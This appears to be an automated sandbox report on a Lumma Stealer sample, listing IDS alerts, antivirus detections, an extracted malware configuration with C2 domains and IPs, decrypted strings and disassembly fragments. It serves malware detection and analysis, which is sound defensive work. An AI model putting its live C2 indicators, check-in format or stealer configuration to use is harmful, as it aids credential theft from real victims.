2024-12-24T02:18:20.446008+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.489323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:22.831849+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:23.131739+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:23.478840+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:25.786583+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.049767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:28.029002+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:28.253360+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49720 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:30.647319+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:33.014934+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49723 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:33.016177+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49722 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:35.342680+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49724 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:35.354173+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49725 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:37.455265+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49726 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:38.944428+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49727 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:39.726092+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49728 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:42.029577+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49729 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:44.807871+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49730 | 172.67.195.241 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T02:18:21.915329+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.936896+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:22.256469+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:24.238070+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.799396+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:28.794733+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:39.723586+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49727 | 172.67.195.241 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T02:18:21.915329+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.936896+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:22.256469+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.799396+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T02:18:24.238070+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:28.794733+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 172.67.195.241 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T02:18:26.991906+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49717 | 172.67.195.241 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T02:18:15.825605+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:15.882650+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:16.547808+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:16.621990+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:17.508551+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:18.493265+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:21.702761+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:22.428578+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | TCP

AV Detection

            Source: https://volcanoyev.click/api9 | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/api | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/ | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/D | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/4 | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/L | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click:443/apiohrz.default-release/key4.dbPK | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/e | Avira URL Cloud: Label: malware
            Source: volcanoyev.click | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click:443/api | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apiSa | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apin | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apiU | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/k? | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/Y | Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/W | Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll | Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll | Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll | Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: 27.2.powershell.exe.4d4efe8.2.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "crosshuaht.lat", "volcanoyev.click", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}
            Source: iviewers.dll | Virustotal: Detection: 38%
            Source: iviewers.dll | ReversingLabs: Detection: 36%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll | Joe Sandbox ML: detected
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: energyaffai.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: discokeyus.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: grannyejh.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: volcanoyev.click
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: VC6Dfm--Loader2
            Source: iviewers.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49717 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49718 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49719 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49720 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49721 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49723 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49722 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49724 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49725 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49726 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49727 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49728 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49729 version: TLS 1.2
            Source: iviewers.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.pdb source: powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1629065195.0000000006DEA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.pdb source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1605796075.0000000004C02000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.pdb source: rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.pdb source: regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb@\ source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb source: powershell.exe, 00000014.00000002.1570488674.00000000055FD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.pdb source: rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb9&7v source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb8'8w source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: number of queries: 2002

            Software Vulnerabilities

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] | 31_2_0043C767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 31_2_0042984F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] | 31_2_00423860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ecx | 31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh | 31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh | 31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then test eax, eax | 31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] | 31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] | 31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ecx], bp | 31_2_0041D83A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push C0BFD6CCh | 31_2_00423086
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push C0BFD6CCh | 31_2_00423086
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 31_2_0042B170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+00000080h] | 31_2_004179C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h | 31_2_0043B1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax | 31_2_0043B1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ecx], dx | 31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-20h] | 31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax | 31_2_00405990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebp, eax | 31_2_00405990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, esi | 31_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ebx], cx | 31_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 31_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], cl | 31_2_0042CA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [esi], al | 31_2_0042DA53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] | 31_2_00416263
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] | 31_2_00415220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push esi | 31_2_00427AD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], cl | 31_2_0042CAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ebx], ax | 31_2_0041B2E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push ebx | 31_2_0043CA93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 31_2_0041CB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [esi], cx | 31_2_0041CB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 31_2_00428B61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], cl | 31_2_0042CB11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], cl | 31_2_0042CB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 31_2_0043F330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax | 31_2_0040DBD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax | 31_2_0040DBD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] | 31_2_00417380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h | 31_2_0041D380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp al, 2Eh | 31_2_00426B95
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 31_2_00435450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] | 31_2_00417380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push 00000000h | 31_2_00429C2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ecx], dx | 31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-20h] | 31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 31_2_004074F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 31_2_004074F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] | 31_2_0043ECA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h | 31_2_004385E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 31_2_004385E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] | 31_2_00417DEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 31_2_00409580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ebp+00h], ax | 31_2_00409580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp dword ptr [0044450Ch] | 31_2_00418591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-68h] | 31_2_00428D93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then xor edi, edi | 31_2_0041759F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [0044473Ch] | 31_2_0041C653
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ebp | 31_2_00425E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp dword ptr [004455F4h] | 31_2_00425E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 31_2_0043AEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then xor byte ptr [esp+eax+17h], al | 31_2_00408F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], bl | 31_2_00408F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 31_2_0042A700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea edx, dword ptr [ecx+01h] | 31_2_0040B70C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [esi], al | 31_2_0041BF14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] | 31_2_00419F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] | 31_2_0041E7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx eax, word ptr [edx] | 31_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [edi], dx | 31_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [esi], cx | 31_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, ebx | 31_2_0042DFE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp ecx | 31_2_0040BFFD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov esi, eax | 31_2_00415799
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 31_2_00415799
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] | 31_2_0043EFB0

            Networking

            Source: Network traffic | Suricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49708 -> 147.45.44.131:80
            Source: Network traffic | Suricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49706 -> 147.45.44.131:80
            Source: Network traffic | Suricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49707 -> 147.45.44.131:80
            Source: Network traffic | Suricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49711 -> 147.45.44.131:80
            Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49710 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49710 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49712 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49712 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49718 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49709 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49716 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49718 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49717 -> 172.67.195.241:443
